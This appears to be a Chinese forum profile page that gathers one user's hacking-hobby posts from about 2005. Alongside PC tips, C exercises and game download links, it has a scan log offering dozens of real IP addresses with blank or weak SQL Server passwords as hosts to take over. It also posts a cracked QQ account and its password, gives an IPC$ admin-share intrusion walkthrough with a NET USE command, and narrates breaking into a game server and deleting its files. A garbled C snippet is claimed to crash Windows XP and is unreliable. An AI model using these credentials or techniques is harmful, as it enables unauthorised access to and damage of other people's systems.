晚上小飞贼
晚上小飞贼
关注数: 12
粉丝数: 301
发帖数: 7,296
关注贴吧数: 6
这个吧主又是重庆的啊.... 做连接了.... 做一个友情连接 呵呵...
WIN XP 也来模仿下 RED HAT FC6 LINUX
呵呵 良子也有吧了 加你为相关贴吧 ~~~贼贼来了。。。~
WINDOWS XP 无法正常关机的处理办法 朋友陆最近在安装中文版Windows XP的时候遇到了一个问题 他安装Windows XP系统的时候很顺利 安装却无法正常关机 出了这种情况 应该怎么办呢?当然该我出手了 朋友的电脑配置是:K6-2 266MHz @300MHz MVP3(AT板型)主板 160 MB SDRAM(PC100) FUJITSU 10G硬盘 CMI-8330 ISA接口声卡 显卡是SIS6326 AT电源 一看这个配置就是 懂行的就知道是 上世纪的产物了 还装XP ?? 真的又费马达又费电 没办法谁叫他是我的好朋友过去一看 原来执行关机操作后 并不是显示“现在可以安全的关机了”(如果是ATX主板加ATX电源 当然是自动关机) 而是重新启动 只能手动强制关机 其实关机不正常的情况在windows98SE是非常多见的一个情况 常见的原因有: 1.操作系统及主板对ACPI或APM支持不够完善 2.主板之外的各种硬件对ACPI或APM支持不够完善 3.硬件驱动程序的BUG 4.主板的BIOS需要改进 5.系统对快速关机支持不够好(仅对windows98而言) 6 关机前有一些常驻内存的程序示退出并与系统的关机进程有冲突 7 病毒 8 磁盘子系统的故障 如IDE驱动程序与系统兼容性不够好 当然还有许多其它方面的原因 我不可能在此一一赘述 因为朋友是新安装的操作系统 除了声卡的驱动外(其它硬件因操作系统自带驱动) 尚未安装各种应用程序 所以我将问题的重点放在主板及操作系统对电源管理的支持不够完善上 秉着先易后难的原则 首先进入主板的CMOS设置界面 在power management里将PM control by APM关闭,启动进入系统后 再关机 电脑仍然重启 再启动windowsXP 依次进入控制面板\电源管理 点击“休眠”选单 此时启用休眠处于未选中状态 遂勾选“启用休眠” 可仍未能见效 重新进入控制面板里的电源选项 点击“高级电源管理”子页 系统显示:本机支持高级电源管理(APM) 使用APM可降低系统的电源损耗 而此时“启用高级电源管理支持”处于选中态 毫不犹豫地去掉“启用高级电源管理支持” 多耗点电都也罢了 不能正常关机 多别扭啊 接下来当然是关机 OK “现在可以安全的关机”几个字样出来了 哈哈 蛮亲切的嘛 本例是由于本系统对高级电源管理支持不够好所致 或可通过升级BIOS消除故障 只是此主板已是年代久远 可能已找不着更新的BIOS了 所以未曾尝试 对ATX主板 建议仍然启用高级电源管理 否则亦会有可能出现麻烦呢 再启动windowsXP,依次进入控制面板\电源管理,点击“休眠”选单,此时启用休眠处于未选中状态,遂勾选“启用休眠”,可仍未能见效。 重新进入控制面板里的电源选项,点击“高级电源管理”子页,系统显示:本机支持高级电源管理(APM),使用APM可降低系统的电源损耗。而此时“启用高级电源管理支持”处于选中态。毫不犹豫地去掉“启用高级电源管理支持”,多耗点电都也罢了,不能正常关机,多别扭啊。接下来当然是关机,OK,“现在可以安全的关机”几个字样出来了,哈哈,蛮亲切的嘛。 本例是由于本系统对高级电源管理支持不够好所致,或可通过升级BIOS消除故障,只是此主板已是年代久远,可能已找不着更新的BIOS了,所以未曾尝试,对ATX主板,建议仍然启用高级电源管理,否则亦会有可能出现麻烦呢。
晚上小飞贼个人音乐主业 http://4293839.163888.net/person/index.aspx?id=4293839
最初没买联想觉得会~遗憾终身~后来买了联想发觉~终身遗憾~
CHINAHACKER( 中国黑客联盟)正式开启服务器托管业务 详细 请见 http://www.chinahacker.com/idc/
这个GBA游戏不错 编号 2273 - Summon Night Craft Sword Monogatari Hajimari no Ishi (J) 铸剑物语 - 起源之石希望能出汉化..... 在很多有编号的网站可以下载到
调试程序中发现可以让 2000/XP 死机的代码(C 语言) 现在本人也算半个程序员 无事就喜欢写点小程序. 无意之间发现 运行一代码 使XP 死机了 而且试的几次都是这样 还把调试程序用的 LCC 弄坏了 但是 在 LINUX 系统下并没有出现问题 是XP 的问题 C的代码是这样 #include /全局函数 void mian() /主函数 { printf("/t/b/b") /输出语言 } / 后面部分是说明不用写入 这里说一下 一般编程的话 C 语言一般是 LCC , MS VC++ ,TC , LCC-WIN32 等 可用来调试生成程序 这段代码反正也是无聊 乱整的 估计与XP 的对话插件 或 模板有冲突 至于详细的位置本人也正在研究 至于也可让2000 死机 也只是个推论 因为 XP 和2000 内核代码是一样的 这里罗嗦下 如果想成为 黑客 基本的东西 就包括 编程... 但是用代码所造成不良与本人无关............... 小飞贼 05/12/7
调试程序中发现可以让 2000/XP 死机的代码(C 语言) 现在本人也算半个程序员 无事就喜欢写点小程序.无意之间发现 运行一代码 使XP 死机了 而且试的几次都是这样 还把调试程序用的 LCC 弄坏了 但是 在 LINUX 系统下并没有出现问题 是XP 的问题 C的代码是这样 #include /全局函数void mian() /主函数{ printf("/t/b/b") /输出语言}/ 后面部分是说明不用写入这里说一下 一般编程的话 C 语言一般是LCC , MS VC++ ,TC , LCC-WIN32 等 可用来调试生成程序 这段代码反正也是无聊 乱整的 估计与XP 的对话插件 或 模板有冲突 至于详细的位置本人也正在研究 至于也可让2000 死机 也只是个推论 因为 XP 和2000 内核代码是一样的这里罗嗦下 如果想成为 黑客 基本的东西 就包括 编程...但是用代码所造成不良与本人无关...............小飞贼 05/12/7
一个ONI 奥泥的BT 下载地址 绝对可下 ONI ISO 光盘静象 http://lib.verycd.com/2004/12/04/0000029050.html 418.7MB 还有面CD 补丁 喜欢ONI 的人快去啊...... 最好斑竹+个精
一个ONI 奥泥的BT 下载地址 绝对可下 ONI ISO 光盘静象 http://lib.verycd.com/2004/12/04/0000029050.html 418.7MB 还有面CD 补丁 喜欢ONI 的人快去啊...... 最好斑竹+个精
关于合金装备的2个下载地址 http://www.cnemule.com/html/game_tv/054291558483492.htm这个地址需要下载一个电骡 BT 下载 上ISO 文件PS 版本的 我现在刚下玩 正在玩中http://www.d1111.com/http://www.d1111.com/SoftView.Asp?SoftID=304PC 的版的合金装备1... 76MB 这个下载速度满快
强烈指责~十面埋伏de海盗~的失职 某吧住 十面埋伏de海盗 有心的人希望看看他发的贴 居然是什么讨论感情话题的 居然还给自己加精晕 这里是黑客吧 是讨论技术的 不是让你讨论感情和男女之间的 就算可以讨论 感情你也没有必要加精啊 在看看 某吧主的回复 全是些没技术含量的 这样的人居然也想当某吧主 吧住看见可以删除 没别的意思只给予警告 提醒
经验:黑客突破防火墙常用的几种技术 懒懒散散终于弄完 花了我一个多月时间~~~~文章比较长 有兴趣的就看下吧 没耐性的人就快闪~~~首先,我们需要了解一些基本的防火墙实现原理。防火墙目前主要分包过滤,和状态检测的包过滤,应用层代理防火墙。但是他们的基本实现都是类似的。 │ │---路由器-----网卡│防火墙│网卡│----------内部网络│ │ 防火墙一般有两个以上的网络卡,一个连到外部(router),另一个是连到内部网络。当打开主机网络转发功能时,两个网卡间的网络通讯能直接通过。当有防火墙时,他好比插在网卡之间,对所有的网络通讯进行控制。 说到访问控制,这是防火墙的核心了:),防火墙主要通过一个访问控制表来判断的,他的形式一般是一连串的如下规则: 1 accept from+ 源地址,端口 to+ 目的地址,端口+ 采取的动作 2 deny ...........(deny就是拒绝。。) 3 nat ............(nat是地址转换。后面说) 防火墙在网络层(包括以下的炼路层)接受到网络数据包后,就从上面的规则连表一条一条地匹配,如果符合就执行预先安排的动作了!如丢弃包。。。。 但是,不同的防火墙,在判断攻击行为时,有实现上的差别。下面结合实现原理说说可能的攻击。 二、攻击包过滤防火墙 包过滤防火墙是最简单的一种了,它在网络层截获网络数据包,根据防火墙的规则表,来检测攻击行为。他根据数据包的源IP地址;目的IP地址;TCP/UDP源端口;TCP/UDP目的端口来过滤!!很容易受到如下攻击: 1 ip 欺骗攻击: 这种攻击,主要是修改数据包的源,目的地址和端口,模仿一些合法的数据包来骗过防火墙的检测。如:外部攻击者,将他的数据报源地址改为内部网络地址,防火墙看到是合法地址就放行了:)。可是,如果防火墙能结合接口,地址来匹配,这种攻击就不能成功了:( 2 d.o.s拒绝服务攻击 简单的包过滤防火墙不能跟踪 tcp的状态,很容易受到拒绝服务攻击,一旦防火墙受到d.o.s攻击,他可能会忙于处理,而忘记了他自己的过滤功能。:)你就可以饶过了,不过这样攻击还很少的。! 3 分片攻击 这种攻击的原理是:在IP的分片包中,所有的分片包用一个分片偏移字段标志分片包的顺序,但是,只有第一个分片包含有TCP端口号的信息。当IP分片包通过分组过滤防火墙时,防火墙只根据第一个分片包的Tcp信息判断是否允许通过,而其他后续的分片不作防火墙检测,直接让它们通过。 这样,攻击者就可以通过先发送第一个合法的IP分片,骗过防火墙的检测,接着封装了恶意数据的后续分片包就可以直接穿透防火墙,直接到达内部网络主机,从而威胁网络和主机的安全。 4 木马攻击 对于包过滤防火墙最有效的攻击就是木马了,一但你在内部网络安装了木马,防火墙基本上是无能为力的。 原因是:包过滤防火墙一般只过滤低端口(1-1024),而高端口他不可能过滤的(因为,一些服务要用到高端口,因此防火墙不能关闭高端口的),所以很多的木马都在高端口打开等待,如冰河,subseven等。。。 但是木马攻击的前提是必须先上传,运行木马,对于简单的包过滤防火墙来说,是容易做的。这里不写这个了。大概就是利用内部网络主机开放的服务漏洞。 早期的防火墙都是这种简单的包过滤型的,到现在已很少了,不过也有。现在的包过滤采用的是状态检测技术,下面谈谈状态检测的包过滤防火墙。三、攻击状态检测的包过滤 状态检测技术最早是checkpoint提出的,在国内的许多防火墙都声称实现了状态检测技术。 可是:)很多是没有实现的。到底什么是状态检测? 一句话,状态检测就是从tcp连接的建立到终止都跟踪检测的技术。 原先的包过滤,是拿一个一个单独的数据包来匹配规则的。可是我们知道,同一个tcp连接,他的数据包是前后关联的,先是syn包,-》数据包=》fin包。数据包的前后序列号是相关的。
C语言实际应用 10个 C 语言是起源较早 应用教广的语言 C语言家族包括 C VC C++NET 就是我们现在所使用 WINDOWS 中也有不少是用 VC++ 写成的程序~ 以下是一些 实用例子【程序1】题目:有1、2、3、4个数字,能组成多少个互不相同且无重复数字的三位数?都是多少?1.程序分析:可填在百位、十位、个位的数字都是1、2、3、4。组成所有的排列后再去 掉不满足条件的排列。 2.程序源代码:main(){int i,j,k;printf("\n");for(i=1;i<5;i++) /*以下为三重循环*/ for(j=1;j<5;j++) for (k=1;k<5;k++) { if (i!=k&&i!=j&&j!=k) /*确保i、j、k三位互不相同*/ printf("%d,%d,%d\n",i,j,k); }}==============================================================【程序2】题目:企业发放的奖金根据利润提成。利润(I)低于或等于10万元时,奖金可提10%;利润高 于10万元,低于20万元时,低于10万元的部分按10%提成,高于10万元的部分,可可提 成7.5%;20万到40万之间时,高于20万元的部分,可提成5%;40万到60万之间时高于 40万元的部分,可提成3%;60万到100万之间时,高于60万元的部分,可提成1.5%,高于 100万元时,超过100万元的部分按1%提成,从键盘输入当月利润I,求应发放奖金总数?1.程序分析:请利用数轴来分界,定位。注意定义时需把奖金定义成长整型。 2.程序源代码:main(){long int i;int bonus1,bonus2,bonus4,bonus6,bonus10,bonus;scanf("%ld",&i);bonus1=100000*0.1;bonus2=bonus1+100000*0.75;bonus4=bonus2+200000*0.5;bonus6=bonus4+200000*0.3;bonus10=bonus6+400000*0.15; if(i<=100000) bonus=i*0.1; else if(i<=200000) bonus=bonus1+(i-100000)*0.075; else if(i<=400000) bonus=bonus2+(i-200000)*0.05; else if(i<=600000) bonus=bonus4+(i-400000)*0.03; else if(i<=1000000) bonus=bonus6+(i-600000)*0.015; else bonus=bonus10+(i-1000000)*0.01;printf("bonus=%d",bonus);} ==============================================================【程序3】题目:一个整数,它加上100后是一个完全平方数,再加上168又是一个完全平方数,请问该数是多少?1.程序分析:在10万以内判断,先将该数加上100后再开方,再将该数加上268后再开方,如果开方后 的结果满足如下条件,即是结果。请看具体分析:2.程序源代码:#include "math.h"main(){long int i,x,y,z;for (i=1;i<100000;i++) { x=sqrt(i+100); /*x为加上100后开方后的结果*/ y=sqrt(i+268); /*y为再加上168后开方后的结果*/ if(x*x==i+100&&y*y==i+268)/*如果一个数的平方根的平方等于该数,这说明此数是完全平方数*/ printf("\n%ld\n",i); }}==============================================================【程序4】题目:输入某年某月某日,判断这一天是这一年的第几天?1.程序分析:以3月5日为例,应该先把前两个月的加起来,然后再加上5天即本年的第几天,特殊 情况,闰年且输入月份大于3时需考虑多加一天。2.程序源代码:main(){int day,month,year,sum,leap;printf("\nplease input year,month,day\n");scanf("%d,%d,%d",&year,&month,&day);switch(month)/*先计算某月以前月份的总天数*/{ case 1:sum=0;break; case 2:sum=31;break; case 3:sum=59;break;
C语言 实际应用10个 C 语言是起源较早 应用教广的语言 C语言家族包括 C VC C++NET 就是我们现在所使用 WINDOWS 中也有不少是用 VC++ 写成的程序~ 以下是一些 实用例子【程序1】题目:有1、2、3、4个数字,能组成多少个互不相同且无重复数字的三位数?都是多少?1.程序分析:可填在百位、十位、个位的数字都是1、2、3、4。组成所有的排列后再去 掉不满足条件的排列。 2.程序源代码:main(){int i,j,k;printf("\n");for(i=1;i<5;i++) /*以下为三重循环*/ for(j=1;j<5;j++) for (k=1;k<5;k++) { if (i!=k&&i!=j&&j!=k) /*确保i、j、k三位互不相同*/ printf("%d,%d,%d\n",i,j,k); }}==============================================================【程序2】题目:企业发放的奖金根据利润提成。利润(I)低于或等于10万元时,奖金可提10%;利润高 于10万元,低于20万元时,低于10万元的部分按10%提成,高于10万元的部分,可可提 成7.5%;20万到40万之间时,高于20万元的部分,可提成5%;40万到60万之间时高于 40万元的部分,可提成3%;60万到100万之间时,高于60万元的部分,可提成1.5%,高于 100万元时,超过100万元的部分按1%提成,从键盘输入当月利润I,求应发放奖金总数?1.程序分析:请利用数轴来分界,定位。注意定义时需把奖金定义成长整型。 2.程序源代码:main(){long int i;int bonus1,bonus2,bonus4,bonus6,bonus10,bonus;scanf("%ld",&i);bonus1=100000*0.1;bonus2=bonus1+100000*0.75;bonus4=bonus2+200000*0.5;bonus6=bonus4+200000*0.3;bonus10=bonus6+400000*0.15; if(i<=100000) bonus=i*0.1; else if(i<=200000) bonus=bonus1+(i-100000)*0.075; else if(i<=400000) bonus=bonus2+(i-200000)*0.05; else if(i<=600000) bonus=bonus4+(i-400000)*0.03; else if(i<=1000000) bonus=bonus6+(i-600000)*0.015; else bonus=bonus10+(i-1000000)*0.01;printf("bonus=%d",bonus);} ==============================================================【程序3】题目:一个整数,它加上100后是一个完全平方数,再加上168又是一个完全平方数,请问该数是多少?1.程序分析:在10万以内判断,先将该数加上100后再开方,再将该数加上268后再开方,如果开方后 的结果满足如下条件,即是结果。请看具体分析:2.程序源代码:#include "math.h"main(){long int i,x,y,z;for (i=1;i<100000;i++) { x=sqrt(i+100); /*x为加上100后开方后的结果*/ y=sqrt(i+268); /*y为再加上168后开方后的结果*/ if(x*x==i+100&&y*y==i+268)/*如果一个数的平方根的平方等于该数,这说明此数是完全平方数*/ printf("\n%ld\n",i); }}==============================================================【程序4】题目:输入某年某月某日,判断这一天是这一年的第几天?1.程序分析:以3月5日为例,应该先把前两个月的加起来,然后再加上5天即本年的第几天,特殊 情况,闰年且输入月份大于3时需考虑多加一天。2.程序源代码:main(){int day,month,year,sum,leap;printf("\nplease input year,month,day\n");scanf("%d,%d,%d",&year,&month,&day);switch(month)/*先计算某月以前月份的总天数*/{ case 1:sum=0;break; case 2:sum=31;break; case 3:sum=59;break;
汗 本人要正式工作 告别 每天上网的生活了 8/12 日 我满 18岁 似乎就决定不久 要全身心 投入紧张的工作中了~~~以后上网的机会 会少很多了 ~~~
防暴数据库 这个是我看了别人的暴库经验总结出来的~我们现在分析~几个常用的符号的二次编码#=%23 /=%2F我们看到这里应该有头绪了吧~没错了,你想到点了~我们把文件夹(数据库路经也是数据库文件夹的名字)写成#5%2F#25%2F4把数据库名字写成类似的~比如#2#%2F#5%23%2F520.asp那么数据库的路痉就是#5%2F#25%2F4/#2#%2F#5%23%2F520.asp我们先来分析这个~当别人暴了库,看到这个的时候,他会马上下载并且把#换成%23呵呵,他这样也不能下载,为什么呢,我们来分析一下上面的数据库名字和文件夹名字,#5%2F#25%2F4把他转换后,%23%2F%2325%2F4他变成了这个再把数据库来换一下#2#%2F#5%23%2F520换成=%232%23%2F%235%23%2F520,他这样输如后,IE再进行编码就换成了#5/#25/4/#2#/#5#/520.asp你看,这一编码,这地址和文件名字都不对了~编码后也不能下载了,不编码更不能下载了~呵呵~如果说的不好,请留言,我到时候做个教程~
关于防御暴数据库的方法
入侵日记: IPC入侵学习报告 这个呢 是N年之前的事情了 以前叫晚上过客 根据现在菜鸟多的情况特别整理 好了声明:这是一个很简单的IPC 默认共享漏洞 希望高手就不要看了~ 这文章也是在自己电脑上写好以后复制的 因为我本身打字速度也不怎么样 :)好了需要先了解思路 2000和XP 都有默认共享 查看共享的方法是 开打CMD(在运行下输入CMD) 打开CMD之后 输入命令 NET SHARE 输入之后按回车~ 可以看到自己的一些共享的资源 如果没有共享资源 只会显示 IPC$ 远程IPC 至于删除默认共享的方法 我之后在说 好了进入正题~~ IPC入侵 首先 开打CMD 输入命令 NET USE Z:\\67.XXX.XX.XX\D$ "" /USER:"ADMINISTRATOR"不知道什么意思 ? 我来解释吧~
想认识我 相信我的人就进来看看吧
hacker的常见攻击流程~~~ 常见攻击流程 以下文章来源于书本《HACKER-----欺骗的艺术》(全英文) 如要转载请注明出处 第一步:隐藏自已的位置 普通攻击者都会利用别人的电脑隐藏他们真实的IP地址。老练的攻击者还会利用电话的无人转接服务联接ISP,然后再盗用他人的帐号上网。 第二步:寻找目标主机并分析目标主机 攻击者首先要寻找目标主机并分析目标主机。在Internet上能真正标识主机的是IP地址,域名是为了便于记忆主机的IP地址而另起的名字,只要利用域名和IP地址就可以顺利地找到目标主机。当然,知道了要攻击目标的位置还是远远不够的,还必须将主机的操作系统类型及其所提供服务等资料作个全面的了解。此时,攻击者们会使用一些扫描器工具,轻松获取目标主机运行的是哪种操作系统的哪个版本,系统有哪些帐户,WWW、FTP、Telnet 、SMTP等服务器程序是何种版本等资料,为入侵作好充分的准备。 第三步:获取帐号和密码,登录主机 攻击者要想入侵一台主机,首先要有该主机的一个帐号和密码,否则连登录都无法进行。这样常迫使他们先设法盗窃帐户文件,进行破解,从中获取某用户的帐户和口令,再寻觅合适时机以此身份进入主机。当然,利用某些工具或系统漏洞登录主机也是攻击者常用的一种技法。 第四步:获得控制权 攻击者们用FTP、Telnet等工具利用系统漏洞进入进入目标主机系统获得控制权之后,就会做两件事:清除记录和留下后门。他会更改某些系统设置、在系统中置入特洛伊木马或其他一些远程操纵程序,以便日后可以不被觉察地再次进入系统。大多数后门程序是预先编译好的,只需要想办法修改时间和权限就可以使用了,甚至新文件的大小都和原文件一模一样。攻击者一般会使用rep传递这些文件,以便不留下FTB记录。清除日志、删除拷贝的文件等手段来隐藏自己的踪迹之后,攻击者就开始下一步的行动。 第五步:窃取网络资源和特权 攻击者找到攻击目标后,会继续下一步的攻击。如:下载敏感信息;实施窃取帐号密码、信用卡号等经济偷窃;使网络瘫痪。好的黑客会通知管理员修补相关漏洞
原创:黑客也能做漫画 不看可惜哦!!! 先说点开场白: 其实呢 一个黑客的完美境界 就是全能 就是不论在网业设计 程序设计 图形设计 动画制作 硬件 网络组建等 都要随心岁遇 想怎么样就怎么样 完美黑客应该是指电脑全能者对于 黑客 ~完美~的技术是黑客的追求至高境界~
一个垃圾QQ 谁要 号码 21446156 密码 11 密码居然是11 我花了1分种就破了~晕~ 这样的密码~
送有SQL 服务漏洞的肉鸡 肉鸡啦 219.76.162.83]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.76.166.40]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.76.132.101]: 发现SQL-Server弱口令 "user/[口令与用户名相同]" ()[219.76.162.83]: "SQL-Server弱口令"扫描完成, 发现 1.[219.76.168.144]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.76.132.101]: "SQL-Server弱口令"扫描完成, 发现 1.[219.76.166.40]: "SQL-Server弱口令"扫描完成, 发现 1.[219.76.168.144]: "SQL-Server弱口令"扫描完成, 发现 1.[219.76.235.218]: 发现SQL-Server弱口令 "sa/654321" ([219.76.233.50]: 发现SQL-Server弱口令 "test/[口令与用户名相同]" ([219.76.233.50]: "SQL-Server弱口令"扫描完成, 发现 1.[219.77.36.15]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.76.235.218]: "SQL-Server弱口令"扫描完成, 发现 1.[219.77.99.191]: 发现SQL-Server弱口令 "admin/123456" ()[219.77.36.15]: "SQL-Server弱口令"扫描完成, 发现 1.[219.77.99.191]: "SQL-Server弱口令"扫描完成, 发现 1.[219.78.193.196]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.78.193.196]: "SQL-Server弱口令"扫描完成, 发现 1.[219.79.208.84]: 发现SQL-Server弱口令 "sa/[空口令]" )[219.79.208.84]: "SQL-Server弱口令"扫描完成, 发现 1.[219.82.33.128]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.82.102.233]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.82.33.128]: "SQL-Server弱口令"扫描完成, 发现 1.[219.82.102.233]: "SQL-Server弱口令"扫描完成, 发现 1.[219.83.68.51]: "SQL-Server弱口令"扫描完成, 发现 1.[219.91.95.167]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.91.162.209]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.91.69.175]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.91.164.81]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]" ()[219.91.164.83]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]" ()[219.91.95.167]: "SQL-Server弱口令"扫描完成, 发现 1.[219.93.4.211]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]" ()[219.91.69.175]: "SQL-Server弱口令"扫描完成, 发现 1.[219.91.164.81]: "SQL-Server弱口令"扫描完成, 发现 1.[219.91.162.209]: "SQL-Server弱口令"扫描完成, 发现 1.[219.93.18.202]: 发现SQL-Server弱口令 "test/[口令与用户名相同]" ()[219.93.18.202]: "SQL-Server弱口令"扫描完成, 发现 1.[219.93.4.211]: "SQL-Server弱口令"扫描完成, 发现 1.[219.91.164.83]: "SQL-Server弱口令"扫描完成, 发现 1.[219.93.241.110]: 发现SQL-Server弱口令 "sql/123123" ()[219.93.241.110]: "SQL-Server弱口令"扫描完成, 发现 1.[219.95.7.134]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]" ()[219.97.37.44]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.97.127.60]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.97.137.217]: 发现SQL-Server弱口令 "sa/[空口令]" ([219.97.180.65]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.97.37.44]: "SQL-Server弱口令"扫描完成, 发现 1.[219.99.25.4]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.95.7.134]: "SQL-Server弱口令"扫描完成, 发现 1.[219.97.137.217]: "SQL-Server弱口令"扫描完成, 发现 1.[219.97.180.65]: "SQL-Server弱口令"扫描完成, 发现 1.[219.97.127.60]: "SQL-Server弱口令"扫描完成, 发现 1.[219.99.25.4]: "SQL-Server弱口令"扫描完成, 发现 1.[219.100.196.6]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.101.142.24]: 发现SQL-Server弱口令 "test/[口令与用户名相同]" ()[219.100.196.6]: "SQL-Server弱口令"扫描完成, 发现 1.[219.101.142.24]: "SQL-Server弱口令"扫描完成, 发现 1.[219.106.133.213]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.106.133.213]: "SQL-Server弱口令"扫描完成, 发现 1.[219.110.74.235]: 发现SQL-Server弱口令 "sa/[空口令]" ([219.110.79.227]: 发现SQL-Server弱口令 "sa/[空口令]" ()[219.110.90.73]: 发现SQL-Server弱口令 "sa/[口令与用户名相同]" [219.111.60.74]: 发现SQL-Server弱口令 "sa/[空口令]"
关于有人提问IP地址 现在我做出回答 以下内容来自于书本 部分文字有删改 原书本名称是<<局域网组建>>概念 连在某个网络上的两台计算机在相互通信时,在它们所传送的数据包里含有某些附加信息,这些附加信息就是发送数据的计算机的地址和接受数据的计算机的地址。当网络中存在以IP协议为基础的通信时,这些发送和接受数据的地址就是IP地址。 基本地址格式 现在的IP网络使用32位地址,以点分十进制表示,如172.16.0.0。地址格式为:IP地址=网络地址+主机地址 或 IP地址=主机地址+子网地址+主机地址。 IP地址类型 最初设计互联网络时,为了便于寻址以及层次化构造网络,每个IP地址包括两个标识码(ID),即网络ID和主机ID。同一个物理网络上的所有主机都使用同一个网络ID,网络上的一个主机(包括网络上工作站,服务器和路由器等)有一个主机ID与其对应。IP地址根据网络ID的不同分为5种类型,A类地址、B类地址、C类地址、D类地址和E类地址。 1. A类IP地址 一个A类IP地址由1字节的网络地址和3字节主机地址组成,网络地址的最高位必须是“0”, 地址范围从1.0.0.0 到126.0.0.0。可用的A类网络有126个,每个网络能容纳1亿多个主机。 2. B类IP地址 一个B类IP地址由2个字节的网络地址和2个字节的主机地址组成,网络地址的最高位必须是“10”,地址范围从128.0.0.0到191.255.255.255。可用的B类网络有16382个,每个网络能容纳6万多个主机 。 3. C类IP地址 一个C类IP地址由3字节的网络地址和1字节的主机地址组成,网络地址的最高位必须是“110”。范围从192.0.0.0到223.255.255.255。C类网络可达209万余个,每个网络能容纳254个主机。 4. D类地址用于多点广播(Multicast)。 D类IP地址第一个字节以“lll0”开始,它是一个专门保留的地址。它并不指向特定的网络,目前这一类地址被用在多点广播(Multicast)中。多点广播地址用来一次寻址一组计算机,它标识共享同一协议的一组计算机。 5. E类IP地址 以“llll0”开始,为将来使用保留。 全零(“0.0.0.0”)地址对应于当前主机。全“1”的IP地址(“255.255.255.255”)是当前子网的广播地址。 在IP地址3种主要类型里,各保留了3个区域作为私有地址,其地址范围如下: A类地址:10.0.0.0~10.255.255.255 B类地址:172.16.0.0~172.31.255.255 C类地址:192.168.0.0~192.168.255.255【友情提示:如果你的地址是私有地址,那么恭喜你,你是内网用户,你不能使用一些需要公网ip的软件】子网掩码子网掩码是一个32位2进制地址,用于快速确定ip地址的哪部分表示网络号,那部分标识主机号,判断2个ip地址是否属于同一网络,这样就产生了子网掩码,子网掩码是按照ip地址格式给出的,a,b,c类的子网掩码如下a:255.0.0.0b:255.255.0.0c:255.255.255.0如:10.65.96.1是a类ip,所以默认的子网掩码就是255.0.0.0例如202.10.138.6和202.10.138.95是c类的ip所以掩码就是255.255.255.0进行运算后得出两者网络号相同,说明2主机位于同一网络。子网掩码的另一个用处就是划分子网,在实际营中中,经常遇到网络号不够用的问题,需要把主机号标识部分的一些2进制位划分出来标识子网动态和非动态ip网络的主机ip有固定和动态ip之分,对于一些提供internet服务的机构如信息港了,开发了【www,ftp,telnet,E-mail】服务的服务器,通常需要对外公布一个固定ip,方便用户访问。这些机构往往有专线接入,ip是固定的。对于拨号上网【包括adsl拨号】的用户,由于上网的时间和空间的非固定性,为每个人提供一个ip地址是对ip资源的极大浪费。所以这些用户要拨入其isp的DHCP服务器时【会获得一个不固定的ip】当然有范围限制的。而在其每次连接时间内是固定的而不是随时变化的,而任意两次连接的获得的ip是不重复的。查询ip查看自己的ip可以使用下面的方法win98中使用“运行”然后输入“winipcfg"里面显示了ip地址,网关,子网掩码,等详细信息对于NT用户可以在cmd下使用inconfig来查看【用netstat -an也可以查看ip】
入侵日记:为了好友入侵CS服务器 这件事是 今年5月份的事了 有一个朋友向我哭诉 他的QQ被盗 我一听我想八成又是让我帮他找回 但是 他还不知道怎么被盗的晕~~~~~ 我问他有没有上什么网站 他说 没有只是这几天 只 有玩CS而已是在别人的服务器中玩 我想问题一定在这服务器里 他还好记得那IP 我连接上看看了 CS的配置 发现一个 后缀为EXE 的文件 怎么会有EXE文件的 我想我大概明白了 ( 小飞贼版权所有) 玩CS的时候 因为要配合服务器配置 需要下载服务器上的 音乐和配置信息 CS游戏估计把 上面的 木马文件当音乐或配置文件下载了~~~ 汗~ 告诉他是 服务器原因时 他怒道: 把服务器黑了 哎 和我这么好的一朋友 怎么能拒绝 (补充一下 他申请的QQ多数都不用 完全是浪费QQ号码) 我立马开始 动手 不过那管理服务器的人是个菜菜 漏洞N多 不知道是被人上传了 木马还是自己弄的 算了黑了 这么多漏洞 的服务器留着也是害人 ( 小飞贼版权所有) 首先是利用的3389 漏洞 还是WIN2000系统 远程连接了~ 呵呵 还要密码 呵呵不怕 启动帮助文件就能饶过(建议:各位网友最好把不需要的帮助文件删除)先把后缀为EXE 的文件复制下来 经过10分钟的分析 拿到了木马的邮箱和密码 木马是处理完了 接下来黑掉 服务器 不想搞太多 破坏 也只是把 C盘下的 服务配置 server.cfg删除了 好了 我也进了下CS 连接上IP 呵呵 进不了了最后在 桌面上留下 一个文本文件 我是写的对服务器漏洞的处理和相关说明和办法 当然看不懂就不怪我了~ ( 小飞贼版权所有) 过了几天在去看 漏洞的补充是 60% 估计那管理员 有40%内容没看明白没办法 菜鸟 太多~
